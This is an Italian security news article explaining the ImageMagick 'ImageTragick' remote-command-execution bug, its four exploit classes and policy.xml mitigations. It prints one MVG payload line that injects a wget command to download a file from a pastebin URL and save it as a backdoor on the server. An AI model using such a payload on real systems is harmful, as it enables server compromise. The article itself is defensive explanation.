22 Dicembre 2025
HomeAttualitàImageMagick. Il tuo sito è al sicuro dal bug ImageTragick?

ImageMagick. Il tuo sito è al sicuro dal bug ImageTragick?

ImageMagick è un popolare software utilizzato per convertire, modificare e manipolare le immagini. Ha librerie per tutti i linguaggi di programmazione comuni, tra cui PHP, Python, Ruby e molti altri. È anche molto semplice da usare, questo lo ha portato ad essere utilizzato da molti sviluppatori quando necessitano di opzioni di ritaglio dell’immagine o manipolazione di foto.

È anche possibile utilizzare ImageMagick per aggiungere annotazioni di testo alle immagini, ad esempio con l’aggiunta di una barra grigia nella parte inferiore con un avviso di copyright; per eseguire la correzione automatica del colore; per affinare la messa a fuoco di una serie di immagini; per la produzione di GIF animate per siti web; e altro ancora.

ImageMagick supporta anche diversi linguaggi di scripting come MSL (Magick Scripting Language) e MVG (Vector Graphics Magick), che consentono di descrivere le immagini, in entrambi i formati pixel-based e vettoriali.

Tuttavia, le ultime versioni di ImageMagick non filtrano correttamente i nomi dei file che vengono passati alle funzioni che gestiscono i protocolli esterni (come HTTPS). Questo permette a un attacker di eseguire i comandi a distanza caricando un’immagine. Il che porta ad una vulnerabilità RCE completa (esecuzione di comando remoto) nell’uploader di immagini. La vulnerabilità è così grave che i ricercatori hanno creato un divertente nick name più facile da ricordare al posto del codice CVE-2.016-3.714 ovvero ImageTragick.

 

Come funziona il bug ImageMagick

La vulnerabilità è molto semplice da sfruttare, un attaccante ha bisogno solo di uno strumento: l’uploader di un’immagine per fare leva sul codice di ImageMagick. Ci sono molte applicazioni web popolari e prodotti SaaS vulnerabili. Purtroppo, anche con tutta l’attenzione dei media, non tutti sono a conoscenza di questo problema.

Approfondendo questa vulnerabilità può effettivamente essere divisa in 4 diverse fasi, come ha spiegato molto bene Karim Valiev dal team Security Mail.Ru in questa discussione.

  1. Esecuzione di un comando a distanza attraverso upload di file MVG / .svg . Tramite un file un aggressore può forzare un comando di shell da eseguire sul server. Questo è un esempio molto semplice di come può funzionare:
    immagine su 0,0 1,1 'url (https: "; wget" http://pastebin.com/raw/badpastebin "-O /home/vhosts/file/backdoor.pl")'

    Quando viene aggiunto un file MVG, il comando wget viene eseguito e l’output del file salvato su pastebin in backdoor.pl.

  2. Cancellazione del file remoto. Quando si utilizza il pseudo protocollo “ephemeral:/” un utente malintenzionato può rimuovere i file sul server
  3. Spostamento di un file remoto: simile alla sua eliminazione, ma quando si utilizza il pseudo protocollo ” MSL: / “, l’attaccante può spostare i file
  4. La divulgazione dei file contenuti nel server quando si utilizza il protocollo ” label: @ “.

Quando si combinano tutti questi bug, gli attaccanti hanno una vasta gamma di opzioni e strumenti per compromettere una applicazione web che sfrutta ImageMagick. Si noti che solo il filtraggio per l’estensione MGV non è sufficiente, in quanto qualsiasi formato di file verrà ispezionato e il comando eseguito.

Si fa notare inoltre che altri strumenti IDS non rilevano e questo problema.

Come proteggere il vostro sito

Gli utenti dietro un WAF (Web Application Firewall) sono già protetti contro questa vulnerabilità, ma si consiglia comunque a tutti di seguire le raccomandazione degli sviluppatori ImageMagick e di modificare il file /etc/ImageMagick/policy.xml e disabilitare l’elaborazione delle MVG, HTTPS, EPHEMERAL, e MSL.

Nella parte seguente, aggiungere le righe:

<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />

Se non è possibile effettuare tali modifiche, disabilitare immediatamente la funzionalità di caricamento delle immagini,  fino a quando è possibile patchare correttamente. Meglio prevenire che curare.

Questo articolo è stato redatto seguendo le indicazioni fornite da Sucuri Security, Sophos, e ImageMagik. Qualsiasi novità verrà aggiunta a questo post aggiornandolo. Potete anche chiedere informazioni più specifiche o altri aiuti, per quello che possiamo aiuteremo a capire meglio questo pericolosa vulnerabilità.

Alex Trizio
Alex Triziohttps://www.alground.com
Alessandro Trizio è un professionista con una solida expertise multidisciplinare, che abbraccia tecnologia avanzata, analisi politica e strategia geopolitica. Ora è Amministratore e Direttore Strategico del Gruppo Trizio, dirigendo il dipartimento di sicurezza informatica. La sua competenza si estende all'applicazione di soluzioni innovative per la sicurezza cibernetica e la risoluzione di criticità complesse.
Altri articoli

TI POSSONO INTERESSARE

Trump avverte: la ‘lobby ebraica’ è in declino

L’intervento di Trump alla festa di Hanukkah 2025 alla Casa Bianca offre un osservatorio privilegiato sui mutamenti dei rapporti di forza tra lobby filo‑israeliane,...

La rivoluzione militare russa: l’istituzione delle Forze dei Sistemi Senza Pilota (VBS)

La creazione ufficiale delle Войска беспилотных систем (VBS), traducibili come Forze dei Sistemi Senza Pilota, rappresenta uno dei cambiamenti organizzativi più significativi nella storia...

Africa Corps, la nuova architettura del potere russo nel Sahel

Dal Mali emerge la trasformazione più significativa della presenza russa in Africa: un passaggio da una forza mercenaria opaca e non legata alle istituzioni...

Lazio Sostenibile: luci e ombre dell’Ecoforum 2025

Le eccellenze dei "Comuni Rifiuti Liberi" sfidano la crisi della Capitale nella decima edizione del dossier di Legambiente. Sant'Ambrogio sul Garigliano guida la rivoluzione...

Le armi del futuro: intelligenza artificiale, tecnologie emergenti e la competizione strategica tra Stati Uniti e Cina

Non si tratta di carri armati o portaerei, ma di algoritmi, chip semiconduttori e sistemi quantistici. Mentre il mondo osserva le tensioni geopolitiche tradizionali,...

ESTA, Cinque anni di social per entrare negli USA

Gli Stati Uniti vogliono conoscere cinque anni di vita online dei viaggiatori. La nuova regola su ESTA apre una fase completamente diversa nel controllo...

Russia e Cina nei cieli dell’Asia orientale: Corea del Sud e Giappone in allarme

Tensione nel Pacifico a seguito di un volo congiunto tra Mosca e Pechino. Tokyo e Seul si allertano e la preoccupazione per eventuali escalation...

La tregua, mediata da Trump, è crollata: Thailandia e Cambogia tornano a combattere

Un conflitto radicato nella storia del confine, una tregua fragile patrocinata dagli Stati Uniti e una violenza riesplosa prima che potesse essere verificata. Il ritorno...

Russia abbatte 77 droni ucraini: colpite Saratov, Rostov e Crimea

La Russia ha respinto nella notte tra il 6 e il 7 dicembre 2025 quella che le autorità di Mosca ha definito una delle...